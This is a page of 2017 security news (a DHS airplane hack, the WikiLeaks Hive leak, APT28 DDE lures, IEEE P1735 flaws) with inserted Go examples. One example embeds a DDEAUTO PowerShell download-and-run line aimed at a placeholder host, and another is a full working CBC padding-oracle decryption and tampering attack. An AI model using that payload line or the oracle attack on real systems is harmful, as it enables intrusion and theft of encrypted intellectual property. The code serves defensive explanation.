A group of researchers and private industry experts, along with DHS officials, remotely hacked a Boeing 757 airplane owned by the DHS that was parked at the airport in Atlantic City, New Jersey.

The team didn’t have physical access to the plane; the experts interacted with the aircraft’s systems remotely via “radio frequency communications.”

The successful experiment took place in September 2016, and the pilots were not informed of the ongoing cyber attack. The team reached their goal in just two days, but the details of the hack were not disclosed and will remain classified.

The experiment and its results were disclosed last week during the 2017 CyberSat Summit in Virginia. The test was revealed by Robert Hickey, aviation program manager with the Cyber Security Division of the DHS Science and Technology (S&T) Directorate.

Many aviation experts said they were aware of the flaw exploited by Hickey and his team, but seven experienced pilots at American Airlines and Delta Air Lines had no knowledge of the issue when they were briefed in March 2017.

“All seven of them broke their jaw hitting the table when they said, ‘You guys have known about this for years and haven’t bothered to let us know because we depend on this stuff to be absolutely the bible,'” explained Hickey.


Even though the Boeing 757 has not been in production since 2004, it is still widely used by many airlines; President Donald Trump’s personal airplane is also a Boeing 757.

Legacy aircraft, which make up more than 90% of the commercial planes currently in use, lack the security protections of newer planes that are built with a security-by-design approach.

Patch management is a big problem in the avionics industry: the cost of changing just one line of code on a piece of avionics equipment can reach $1 million, and it takes a year to implement.

For this reason, security updates are not so frequent.

Hacking an airplane is not a novelty: in 2015, the FBI arrested the expert Chris Roberts, who claimed to have hacked a commercial airplane while in flight, accessing the plane’s systems through a WiFi flaw in the in-flight entertainment system.

Modern aircraft are very sophisticated systems, but the massive introduction of technology has the side effect of expanding their attack surface, and the risk of airplane hacking is underestimated.


Vault 8: WikiLeaks Releases Source Code For Hive - CIA's Malware Control System

10.11.2017 thehackernews BigBrothers

Almost two months after releasing details of 23 different secret CIA hacking tool projects under Vault 7 series, Wikileaks today announced a new Vault 8 series that will reveal source codes and information about the backend infrastructure developed by the CIA hackers.
Not just an announcement: the whistleblower organisation has also published its first batch of Vault 8 leaks, releasing the source code and development logs of Project Hive, a significant backend component the agency used to control its malware remotely and covertly.
In April this year, WikiLeaks disclosed brief information about Project Hive, revealing that the project is an advanced command-and-control server (malware control system) that communicates with malware to send commands to execute specific tasks on the targets and to receive information exfiltrated from the target machines.
Hive is a multi-user all-in-one system that can be used by multiple CIA operators to remotely control multiple malware implants used in different operations.
Hive’s infrastructure has been specially designed to prevent attribution: it includes a public-facing fake website, followed by multi-stage communication over a Virtual Private Network (VPN).
"Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet," WikiLeaks says.
According to the leaked diagram, the malware implants communicate directly with a fake website running on a commercial VPS (Virtual Private Server), which looks innocent when opened directly in a web browser.

However, in the background, after authentication, the malware implant can communicate with the web server hosting the fake website, which then forwards malware-related traffic to a “hidden” CIA server called 'Blot' over a secure VPN connection.
The Blot server then forwards the traffic to an implant operator management gateway called 'Honeycomb.'
To evade scrutiny by network administrators, the malware implants authenticate with fake digital certificates issued in the name of Kaspersky Lab.
"Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities," WikiLeaks says.
"The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town."
The whistleblowing organisation has released the source code for Project Hive which is now available for anyone, including investigative journalists and forensic experts, to download and dig into its functionalities.
The source code published in the Vault 8 series only contains software designed to run on servers controlled by the CIA, while WikiLeaks assures that the organisation will not release any zero-day or similar security vulnerabilities which could be abused by others.


NATO to Increase Cyber Weaponry to Combat Russia
10.11.2017 securityweek BigBrothers
NATO members agreed Wednesday to increase the use of cyber weaponry and tactics during military operations, with the alliance also upgrading other capabilities to combat a resurgent Russia.

The changes are part of the alliance's biggest shakeup since the Cold War, with defence ministers backing the creation of two new command centres to help protect Europe.

The revamp reflects the "changed security environment" of recent years, NATO chief Jens Stoltenberg said at a meeting of defence ministers in Brussels.

The threat to the alliance's eastern flank has grown as a concern after Russia's annexation of Crimea in 2014.

"We are now integrating cyber effects into NATO missions and operations to respond to a changed and new security environment where cyber is part of the threat picture we have to respond to," Stoltenberg said.

"In any military conflict cyber will be an integral part and therefore we need to strengthen our cyber defences and our cyber capabilities," he added, noting that such tactics have been effective in the fight against IS in Iraq and Syria.

After years of stripping back its command structure since the end of the Cold War, NATO wants to add the new command centres -- one to protect lines of communication across the Atlantic and one to coordinate the movement of troops and equipment around Europe.

- NATO hit by cyber attacks -

The creation of a new NATO cyber operations hub comes as the alliance faces hundreds of attacks on its networks every month and fears grow over the Kremlin's electronic tactics.

NATO declared cyber -- where attackers disrupt websites, intercept communications and sabotage technologies used in combat -- as a conflict domain last year, putting it on a par with land, sea and air.

"We have seen a more assertive Russia, we have seen a Russia which has over many years invested heavily in their military capabilities," Stoltenberg said.

"NATO has to be able to respond to that. We are constantly adapting and what we are doing in Europe now is part of that adaptation."

Cyber capabilities will now be included in NATO missions in the same way as planes, tanks and ships -- fully integrated but still under the control of the contributing country.

The two-day meet at NATO headquarters will also cover the North Korean nuclear crisis, which will be the focus of a working dinner on Wednesday, where defence ministers will be joined by the EU's diplomatic chief Federica Mogherini.

US President Donald Trump arrived in Beijing on Wednesday to press China to do more to get Pyongyang to curb its nuclear and ballistic weapons programmes.

- US role in Syria? -

Tensions have soared since Pyongyang carried out its sixth nuclear test -- its most powerful to date.

"All NATO allies agree that we have to put strong pressure on North Korea because North Korea is responsible for reckless behaviour, irresponsible behaviour developing nuclear weapons and by developing missiles," Stoltenberg said.

On Thursday talks will turn to Afghanistan, where NATO plans to boost its training and support mission for local forces by some 3,000 troops.

Later in the day US Defense Secretary Jim Mattis will hold a separate meeting with partners from the coalition fighting IS in the Middle East, where the jihadists continue to lose territory.

As he flew to Europe, Mattis told reporters that coalition partners are looking to the United States for a clear plan about what follows the physical defeat of IS.

"Maybe three-quarters of the questions I am getting asked now is (about) going forward. They are now saying: 'What's next? How is it looking?'" Mattis said.

Following back-to-back losses, including of their Syrian and Iraqi strongholds of Raqa and Mosul, IS fighters are down to defending their last holdouts along the Euphrates River valley.

America's military involvement in Syria has until now been focused solely on fighting IS.

A French source also said allies were keen to hear what Mattis had to say about the role of Iran -- a key supporter of Syrian President Bashar al-Assad -- following Trump's tough rhetoric against Tehran.


WikiLeaks Says CIA Impersonated Kaspersky Lab
10.11.2017 securityweek BigBrothers
WikiLeaks has resumed its CIA leaks and it has now started publishing source code and other files associated with tools allegedly developed by the intelligence agency.

In March, WikiLeaks began publishing documentation files describing what appeared to be CIA hacking tools as part of a leak dubbed Vault 7. Roughly two dozen tools and projects were disclosed over the course of several months.

Now, after a two-month break, WikiLeaks announced a new round of leaks dubbed Vault 8, which provides source code and analysis for CIA tools. The organization pointed out that, similar to Vault 7, Vault 8 will not expose any zero-day or other vulnerabilities that could be used for malicious purposes.

“This publication will enable investigative journalists, forensic experts and the general public to better identify and understand covert CIA infrastructure components,” WikiLeaks said. “Source code published in this series contains software designed to run on servers controlled by the CIA.”

The first Vault 8 leak covers Hive, a project whose documentation was published by WikiLeaks in mid-April. The organization has now released source code and development logs for Hive.

Hive has been described as a tool designed to help malware communicate with a remote server without raising suspicion.

“Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet,” WikiLeaks said. “Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA.”

Hive provides a communication channel between a piece of malware and what WikiLeaks describes as “cover domains.” These domains are boring-looking and they deliver harmless content when accessed.

However, malware implants communicating with these domains authenticate themselves and the traffic they generate is directed to a gateway called Honeycomb, which sends the data to its final destination.

Implants authenticate themselves using digital certificates that impersonate existing entities. One fake certificate is for Russia-based security firm Kaspersky Lab and it pretends to have been issued by South African certificate authority Thawte.

According to WikiLeaks, its analysis revealed that by using these fake certificates, the CIA made it look like data was being exfiltrated by one of the impersonated entities – in this case Kaspersky Lab.

“We have investigated the claims made in the Vault 8 report published on November 9 and can confirm the certificates in our name are fake,” Kaspersky Lab told SecurityWeek. “Our private keys, services and customers are all safe and unaffected.”
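The impersonation described above, and in the Vault 8 article earlier on this page, only works on an observer who reads the subject and issuer names of a certificate and goes no further. The Go program below is an added example, not code from the Hive leak or from any of the parties named: it builds a constructed root CA, a leaf that CA really issued to a vendor, and a forged leaf carrying the same vendor subject and the same issuer name but signed with a key the forger generated, then runs standard chain validation on both. The CA and vendor names are stand-ins, not Thawte or Kaspersky.

```go
// Added example for this page; the CA and vendor names are constructed stand-ins.
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

const (
	caName     = "Stand-in Premium Server CA" // plays the trusted public CA
	vendorName = "Stand-in Anti-Virus Vendor" // plays the impersonated vendor
)

func newKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return k
}

// sign issues tmpl as a certificate whose issuer is parent's subject, signed with signer;
// passing tmpl as its own parent yields a self-signed certificate.
func sign(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, signer *ecdsa.PrivateKey) *x509.Certificate {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil {
		panic(err)
	}
	c, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return c
}

func template(serial int64, cn string, ca bool) *x509.Certificate {
	t := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: cn, Organization: []string{cn}},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
	}
	if ca {
		t.IsCA, t.BasicConstraintsValid = true, true
		t.KeyUsage = x509.KeyUsageCertSign | x509.KeyUsageCRLSign
	} else {
		t.KeyUsage = x509.KeyUsageDigitalSignature
		t.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth} // an implant authenticates as a client
	}
	return t
}

// Scenario holds the trusted root, a leaf it really issued, and a name-identical forgery.
type Scenario struct{ Root, Genuine, Forged *x509.Certificate }

func BuildScenario() Scenario {
	caKey, vendorKey := newKey(), newKey()
	rootT := template(1, caName, true)
	root := sign(rootT, rootT, &caKey.PublicKey, caKey)
	genuine := sign(template(2, vendorName, false), root, &vendorKey.PublicKey, caKey)

	// The forger has no CA key. It mints its own "CA" carrying the same subject name,
	// then issues a leaf from it that copies the vendor's name. Names match; keys do not.
	fakeKey, implantKey := newKey(), newKey()
	fakeT := template(3, caName, true)
	fakeRoot := sign(fakeT, fakeT, &fakeKey.PublicKey, fakeKey)
	forged := sign(template(4, vendorName, false), fakeRoot, &implantKey.PublicKey, fakeKey)
	return Scenario{Root: root, Genuine: genuine, Forged: forged}
}

// VerifyClientCert does what a gateway, or an analyst holding a captured implant
// certificate, should do: validate the chain against the real root, not read the names.
func VerifyClientCert(leaf, trustedRoot *x509.Certificate) error {
	pool := x509.NewCertPool()
	pool.AddCert(trustedRoot)
	_, err := leaf.Verify(x509.VerifyOptions{
		Roots:     pool,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	})
	return err
}

func main() {
	s := BuildScenario()
	for label, c := range map[string]*x509.Certificate{"genuine": s.Genuine, "forged": s.Forged} {
		fmt.Printf("%-7s subject=%q issuer=%q verify=%v\n", label,
			c.Subject.CommonName, c.Issuer.CommonName, VerifyClientCert(c, s.Root))
	}
}
```

In a log line or a packet capture the two leaves are indistinguishable; only validation against the real root's public key separates them, and the forged one fails with an unknown-authority error. That is what Kaspersky's statement about its private keys amounts to: without the CA's or the vendor's key a forger can produce a look-alike, not a certificate that chains. When a captured implant certificate names a public CA, verify it against that CA's actual root before drawing any conclusion about who signed it.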

The news that the CIA may have impersonated Kaspersky Lab in its operations has led some to believe that the U.S. may have actually used such tools to falsely pin cyberattacks on Russia.

The U.S. government has banned the use of Kaspersky products due to the company’s alleged ties to Russian intelligence. A recent report also claimed that Kaspersky products had been used on the computer of an NSA contractor from which Russian hackers stole sensitive files. Kaspersky has denied the allegations and announced a new transparency initiative in an effort to clear its name.


Russia-Linked Spies Deliver Malware via DDE Attack
8.11.2017 securityweek BigBrothers
The Russia-linked cyber espionage group tracked as APT28 and Fancy Bear has started delivering malware to targeted users by leveraging a recently disclosed technique involving Microsoft Office documents and a Windows feature called Dynamic Data Exchange (DDE).

Researchers at McAfee noticed the use of the DDE technique while analyzing a campaign that involved blank documents whose name referenced the recent terrorist attack in New York City.

Researchers warned recently that DDE, a protocol designed for data exchanges between Windows applications, could be used by hackers as a substitute for macros in attacks involving malicious documents. Shortly after, security firms reported seeing attacks leveraging DDE to deliver malware, including Locky ransomware.

Microsoft pointed out that DDE, which has been replaced with Object Linking and Embedding (OLE), is a legitimate feature. The company has yet to make any changes that would prevent attacks, but mitigations included in Windows do provide protection, and users are shown two warnings before the malicious content is executed.
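The point for a defender is that DDE needs no macro and no exploit: the payload is an ordinary Word field, so controls that look for macros miss it, and the only artefact is the field code inside the document's XML. As an added example, not code from McAfee's analysis or from the APT28 samples, the Go program below builds a small .docx in memory (document text and field codes are constructed for the example) and scans every part under word/ for DDE fields, reassembling a field code that Word has split across several instrText runs and reporting one hidden in a header part as well.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"regexp"
	"strings"
)

const wNS = `xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"`
var ddeRe = regexp.MustCompile(`(?i)^"?DDE(AUTO)?\b`) // a field code that invokes the DDE client

// SampleDocx builds a small .docx in memory, constructed for this added example (not a real
// lure): a benign PAGE field, a DDEAUTO field split over three instrText runs, and a fldSimple DDE field in a header part.
func SampleDocx() []byte {
	body := `<?xml version="1.0" encoding="UTF-8"?><w:document ` + wNS + `><w:body>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText> PAGE </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">AUTO c:\\windows\\system32\\cmd.exe </w:instrText></w:r><w:r><w:instrText xml:space="preserve">"/k powershell -w hidden -c iex (iwr http://example.invalid/s)"</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>Loading...</w:t></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>`
	header := `<?xml version="1.0" encoding="UTF-8"?><w:hdr ` + wNS + `><w:p><w:fldSimple w:instr=" DDE &quot;c:\\windows\\system32\\cmd.exe&quot; &quot;/c calc.exe&quot; "><w:r><w:t>x</w:t></w:r></w:fldSimple></w:p></w:hdr>`
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for _, p := range []struct{ name, data string }{{"word/document.xml", body}, {"word/header1.xml", header}} {
		w, _ := zw.Create(p.name) // in-memory archive: Create fails only on a duplicate name
		w.Write([]byte(p.data))
	}
	zw.Close()
	return buf.Bytes()
}

// ScanDocx returns "part: field code" for every DDE field in any word/*.xml part (headers,
// footers, footnotes and endnotes included), treating unparsable XML as an error, not as clean.
func ScanDocx(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, err
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasPrefix(f.Name, "word/") || !strings.HasSuffix(f.Name, ".xml") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		codes, err := fieldCodes(rc)
		rc.Close()
		if err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, code := range codes {
			if ddeRe.MatchString(code) {
				hits = append(hits, f.Name+": "+code)
			}
		}
	}
	return hits, nil
}

// fieldCodes reassembles complex fields (fldChar begin..end, code spread over instrText runs,
// possibly nested) and simple fields (fldSimple w:instr) into whitespace-normalised codes.
func fieldCodes(r io.Reader) ([]string, error) {
	dec := xml.NewDecoder(r)
	codes, depth, inInstr := []string{}, 0, false
	var cur strings.Builder
	for tok, err := dec.Token(); err != io.EOF; tok, err = dec.Token() {
		if err != nil {
			return nil, err
		}
		switch t := tok.(type) {
		case xml.StartElement:
			for _, a := range t.Attr {
				switch {
				case t.Name.Local == "fldSimple" && a.Name.Local == "instr":
					codes = append(codes, strings.Join(strings.Fields(a.Value), " "))
				case t.Name.Local == "fldChar" && a.Name.Local == "fldCharType" && a.Value == "begin":
					depth++
				case t.Name.Local == "fldChar" && a.Name.Local == "fldCharType" && a.Value == "end" && depth > 0:
					if depth--; depth == 0 { // outermost field closed: its code is complete
						codes = append(codes, strings.Join(strings.Fields(cur.String()), " "))
						cur.Reset()
					}
				}
			}
			inInstr = inInstr || t.Name.Local == "instrText" && depth > 0 // code text counts only inside a field
		case xml.EndElement:
			inInstr = inInstr && t.Name.Local != "instrText"
		case xml.CharData:
			if inInstr {
				cur.Write(t)
			}
		}
	}
	return codes, nil
}

func main() { h, err := ScanDocx(SampleDocx()); fmt.Println(strings.Join(h, "\n"), err) }
```

The match runs on the reassembled, whitespace-normalised field code, which is what defeats the split-run layout; result text after the separate marker (the "Loading..." a victim sees) is never part of the code, nested fields are folded into the outermost one, and a part whose XML does not parse is reported as an error rather than passed as clean. Excel workbooks are out of scope here: a DDE link in .xlsx lives in a cell formula, not in a field.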

In the APT28 attacks spotted by McAfee, cyberspies used the document referencing the New York City attack to deliver a first-stage malware tracked as Seduploader. The malware, typically used by the threat actor as a reconnaissance tool, is downloaded from a remote server using PowerShell commands.

Based on the analysis of the malware and command and control (C&C) domains used in the attack, researchers determined that the campaign involving DDE started on October 25.

The attack using the New York City incident as lure appears to be part of a campaign that also involved documents referencing Saber Guardian, a multinational military exercise conducted by the U.S. Army in Eastern Europe in an effort to deter an invasion (by Russia) into NATO territory.

Another recent APT28 attack leveraged a document describing CyCon U.S., a conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) in collaboration with the Army Cyber Institute at West Point. However, the CyCon attack relied on a malicious VBA script and it did not involve DDE.

“Given the publicity the Cy Con U.S campaign received in the press, it is possible APT28 actors moved away from using the VBA script employed in past actions and chose to incorporate the DDE technique to bypass network defenses,” McAfee researchers said in a blog post.

“[The] use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28’s ability and interest in exploiting geopolitical events for their operations,” they added.


U.S. Government Warns of Weakness in IEEE Encryption Standard
8.11.2017 securityweek
The United States Department of Homeland Security’s US-CERT has issued an alert to warn on cryptographic weaknesses impacting the IEEE P1735 standard, which describes methods for encrypting electronic-design intellectual property and the management of access rights for such IP.

The P1735 IEEE standard is used to ensure confidentiality and access control for the design of complex electronics design intellectual property (IP), where multiple IP owners are usually involved. Newly discovered weaknesses, however, reveal that the standard recommends poor cryptographic choices and is vague or silent on security critical decisions.

The methods described in said Institute of Electrical and Electronics Engineers (IEEE) standard are flawed and enable an attacker to recover the entire underlying plaintext IP, United States Computer Emergency Readiness Team (US-CERT) warns.

Because of these flaws, “implementations of IEEE P1735 may be weak to cryptographic attacks that allow an attacker to obtain plaintext intellectual property without the key, among other impacts,” an alert issued on Friday reads.

Some of the attack vectors that said flaws enable are well-known, such as padding-oracle attacks, but others are new, created by the need to support the typical uses of the underlying IP, “in particular, the need for commercial electronic design automation (EDA) tools to synthesize multiple pieces of IP into a fully specified chip design and to provide HDL syntax errors,” the alert reads.

According to US-CERT, an attacker leveraging the commercial EDA tool as a black-box oracle can exploit these vulnerabilities. The attacker would not only be able to recover entire plaintext IP, but also to “produce standard-compliant ciphertexts of IP that have been modified to include targeted hardware Trojans.”

The weaknesses in the P1735 standard are tracked as CVE-2017-13091 (improperly specified padding in CBC mode allows use of an EDA tool as a decryption oracle), CVE-2017-13092 (improperly specified HDL syntax allows use of an EDA tool as a decryption oracle), CVE-2017-13093 (modification of encrypted IP ciphertext to insert hardware Trojans), CVE-2017-13094 (modification of the encryption key and insertion of hardware Trojans in any IP), CVE-2017-13095 (modification of a license-deny response to a license grant), CVE-2017-13096 (modification of Rights Block to get rid of or relax access control), and CVE-2017-13097 (modification of Rights Block to get rid of or relax license requirement).
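CVE-2017-13091 is the textbook CBC padding oracle: the tool's reaction to a ciphertext whose last block unpads incorrectly tells the attacker one bit per query, and at most 256 such queries per byte recover the plaintext without the key. CVE-2017-13093 follows from CBC malleability: flipping bits in ciphertext block n-1 flips the same bits in plaintext block n. The Go program below, an added example and not code from the paper or from any EDA vendor, models the tool as a function that AES-CBC-decrypts an IP blob and fails visibly on bad padding, recovers the plaintext through that oracle alone, then rewrites one plaintext block the way a Trojan insertion would. The key, IV and IP text are constructed.

```go
// Added example for this page (Go, stand-alone); key, IV and IP text are constructed.
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

const bs = aes.BlockSize
var toolKey = []byte("0123456789abcdef0123456789abcdef") // the attacker never sees this

func unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, errors.New("bad length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding") // the leak: this failure is distinguishable
	}
	return b[:len(b)-n], nil
}

// Encrypt is PKCS#7 padding followed by AES-CBC, as an IP owner's packaging step would do it.
func Encrypt(key, iv, pt []byte) []byte {
	blk, _ := aes.NewCipher(key)
	n := bs - len(pt)%bs
	ct := append(append([]byte(nil), pt...), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(ct, ct)
	return ct
}

// ToolDecrypt models the EDA tool: AES-CBC, then a padding check whose failure is observable.
func ToolDecrypt(key, iv, ct []byte) ([]byte, error) {
	blk, _ := aes.NewCipher(key)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(blk, iv).CryptBlocks(pt, ct)
	return unpad(pt)
}

// RecoverBlock recovers one plaintext block given the ciphertext block that precedes it,
// asking the oracle only "does (iv, block) decrypt to valid padding?".
func RecoverBlock(oracle func(iv, ct []byte) bool, prev, target []byte) []byte {
	inter, pt := make([]byte, bs), make([]byte, bs) // inter = D_K(target), learned right to left
	for pos := bs - 1; pos >= 0; pos-- {
		padVal, crafted := byte(bs-pos), make([]byte, bs)
		for i := pos + 1; i < bs; i++ {
			crafted[i] = inter[i] ^ padVal // steer already-known bytes to the wanted pad value
		}
		found := false
		for g := 0; g < 256 && !found; g++ {
			crafted[pos] = byte(g)
			ok := oracle(crafted, target)
			if ok && pos == bs-1 { // re-query with byte 14 flipped: a real 01 pad survives, a lucky 02 02 does not
				crafted[pos-1] ^= 0xff
				ok = oracle(crafted, target)
				crafted[pos-1] ^= 0xff
			}
			if ok {
				inter[pos], found = byte(g)^padVal, true
				pt[pos] = inter[pos] ^ prev[pos]
			}
		}
		if !found {
			panic("no guess accepted: this is not a padding oracle")
		}
	}
	return pt
}

// RecoverAll recovers the whole plaintext from IV and ciphertext alone, never touching the key.
func RecoverAll(oracle func(iv, ct []byte) bool, iv, ct []byte) []byte {
	var out []byte
	for off, prev := 0, iv; off < len(ct); off += bs {
		out = append(out, RecoverBlock(oracle, prev, ct[off:off+bs])...)
		prev = ct[off : off+bs]
	}
	pt, _ := unpad(out)
	return pt
}

// Tamper rewrites plaintext block n (n >= 1) to want by XORing known^want into ciphertext block n-1.
func Tamper(ct []byte, n int, known, want []byte) []byte {
	out := append([]byte(nil), ct...)
	for i := range want {
		out[(n-1)*bs+i] ^= known[i] ^ want[i]
	}
	return out
}

func main() {
	iv, ip := []byte("constructed-iv16"), []byte("// secret IP   \nassign o = a & b; // end of IP \n")
	ct := Encrypt(toolKey, iv, ip)
	oracle := func(v, c []byte) bool { _, err := ToolDecrypt(toolKey, v, c); return err == nil }
	pt := RecoverAll(oracle, iv, ct)
	got, err := ToolDecrypt(toolKey, iv, Tamper(ct, 1, pt[16:32], []byte("assign o = a | b")))
	fmt.Printf("recovered %q\ntampered decrypts to %q (padding ok: %v)\n", pt, got, err == nil)
}
```

Each byte costs at most 256 oracle calls, plus a confirmation query for the last byte of a block, where an accidental 02 02 pad can masquerade as 01; a 64-byte blob therefore falls in a few thousand tool invocations. Tampering block n garbles block n-1, which is why a real attacker has to aim that damage at a comment or another region the synthesizer tolerates. Both paths close if the IP is protected with authenticated encryption such as AES-GCM, where a modified ciphertext is rejected before any padding or syntax is examined.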

The issues are detailed in a research paper titled “Standardizing Bad Cryptographic Practice” (PDF), which was published at the end of September 2017. The paper also provides details on the impact of these security issues.

“An adversary can recover electronic design IPs encrypted using the P1735 workflow, resulting in IP theft and/or analysis of security critical features, as well as the ability to insert hardware Trojans into an encrypted IP without the knowledge of the IP owner. Impacts may include loss of profit and reputation of the IP owners as well as integrated circuits (ICs) with Trojans that contain backdoors, perform poorly, or even fail completely,” US-CERT notes.

To resolve the issue, DHS suggests that developers of EDA software apply the fixes detailed in the researchers' paper. Users are advised to apply any update the vendor releases for their EDA software.

Impacted vendors include AMD, Cadence Design Systems, Cisco, IBM, Intel, Marvell, Mentor Graphics, National Instruments (NI), National Semiconductor Corporation, NXP Semiconductors Inc., Qualcomm, Samsung, Synopsys, Xilinx, and Zuken Inc.


Estonia Arrests Alleged Russian Agent Plotting Cyber-Crime
7.11.2017 securityweek BigBrothers
Estonia said Tuesday it had arrested a suspected Russian spy allegedly plotting a cyber-crime, in the latest incident to strain relations between the small Baltic state and the Kremlin.

The Estonian prosecutor general's office said the unnamed man was suspected of working for Russia's FSB Federal Security Service and of planning a cyber attack targeting state institutions.

"Right now we can say without revealing any details that we've managed to prevent serious damage," Inna Ombler, the state prosecutor in charge of the investigation said in a statement.

Ombler added that the suspect's activities were not connected to an unprecedented electronic ID-card security risk that recently hit the cyber-savvy country.

Dubbed "E-stonia", the eurozone state of 1.3 million people is regarded as being one of the world's most wired nations, with its citizens able to use electronic ID cards to access virtually all public services online via its vast "e-government" portal.

But as of Friday midnight, Tallinn suspended security certificates for up to 760,000 state-issued electronic ID-cards with faulty chips to mitigate the risk of identity theft.

Prime Minister Juri Ratas denied knowledge of any incidents of identity theft as he urged ID-card holders to download an update to patch the flaw in the Swiss-made chips that makes them vulnerable to malware.

Estonia and its neighbors Latvia and Lithuania -- all EU and NATO members -- have been spooked by their Soviet-era master Russia's actions since Moscow annexed Crimea from Ukraine in 2014.

The tensions have led to a spike in espionage affairs and Russia expelled two Estonian diplomats in May after Tallinn booted out its representatives over spying allegations.

In July, a Lithuanian court sentenced a Russian security official to 10 years in prison for spying after prosecutors accused him of attempting to bug the home of President Dalia Grybauskaite.

NATO has deployed four multinational battalions to the three Baltic states and Poland in a sign it is ready to defend any members of the military alliance from a potential attack by Russia.

The Kremlin has denied any territorial ambitions and claims that NATO is trying to encircle Russia.


Twitter-Happy Trump to Enter China's Great Firewall
7.11.2017 securityweek  BigBrothers
US President Donald Trump has tweeted energetically throughout his Asian tour so far, but in China he will likely be one of a select few to skirt the country's ban on his cherished website.

The Twitter-happy president has fired off a slew of posts -- on both domestic and international issues -- since he started his trip in Japan and moved on to South Korea on Tuesday.

But when he lands in China on Wednesday, Trump will enter the so-called "Great Firewall" of online censorship that monitors people's internet habits and blocks websites such as Twitter, Facebook and Google.

Chinese can face fines or even jail time for unfavourable social media posts. Authorities have further tightened internet controls in recent months, shutting down celebrity gossip blogs and probing platforms for "obscenity".

Asked whether Trump -- who will get red-carpet treatment during his state visit -- would be able to tweet, Chinese vice foreign minister Zheng Zeguang told reporters: "How President Trump communicates with the outside is not something you need to worry about."

Trump, who has used an iPhone for Twitter posts, could use some options available to people in China to evade the Great Firewall -- though US presidents in any case travel with their own sophisticated communications systems.

- 'Trump can't live without Twitter' -

Web users can circumvent the firewall if they download a virtual private network (VPN) -- software that allows people to surf the internet as if they were using a server in another country.

But Beijing mandated in January that all developers must obtain government licences to offer VPN software, raising concern it might ban them outright.

Foreign visitors can also access banned websites with their phones if they are in roaming mode -- but only because the authorities currently allow it, according to experts.

Trump should be able to use roaming "but it depends on the policy of the (Chinese) government. If they chose not to allow you to (use roaming) then they can do it," James Gong, a Chinese cyber law expert at Herbert Smith Freehills law firm, told AFP.

"But if you're the president you should be able to do it. Donald Trump cannot live without Twitter," Gong said.

Mobile devices on roaming in China still use the local telecom service infrastructure, which raises privacy and security questions.

Charlie Smith, co-founder of the anti-censorship group Greatfire.org, said phones using data or virtual private networks (VPNs) are "generally" safe from hacking but it depends on the phone, user settings and other factors.

"As you know, every day in China, almost all mobile phone use is monitored and tens of thousands of people are under close watch," he told AFP.

"US officials should be well trained and prepared for travelling overseas and for maintaining secure communications, as the Chinese leadership are when they travel overseas."

Trump could also use an alternative temporary phone as another way to avoid the risk of compromising his smartphone in a country which is often accused of hacking.

- Jail time -

While Trump will likely find ways around the firewall, Chinese people face increasingly stringent controls over what they can do, say and see on the internet.

Chinese internet users face three years in prison for writing defamatory messages that are re-posted 500 times under a law passed in 2013. Web users can be jailed if offending posts are viewed more than 5,000 times.

New rules policing content were imposed this year and several of the country's biggest tech firms were fined for failing to remove illegal online content such as pornography and violence.

China has its own version of Twitter, Weibo, which boasts more than 300 million monthly active users.

Weibo users mostly sounded lukewarm about Trump's upcoming visit: One posted a chart showing heavy pollution levels in Beijing and asked if Trump would regret leaving the Paris climate pact.

But people must be wary of what they write.

Last year, a man who wrote a Weibo post critical of China's decades-old land reform policies on a local traffic police account was sentenced to a year in prison, reports said.

Another man, Qiao Mu, a former professor of international political communications in Beijing, recently moved to the United States after being targeted for his social media commentary.

He said authorities closed over 100 of his Weibo accounts and 17 of his accounts on the WeChat messaging service.

"There is no place for me to publish inside China's firewall," Qiao told AFP, explaining that he had tried to start new accounts after each was shut down.


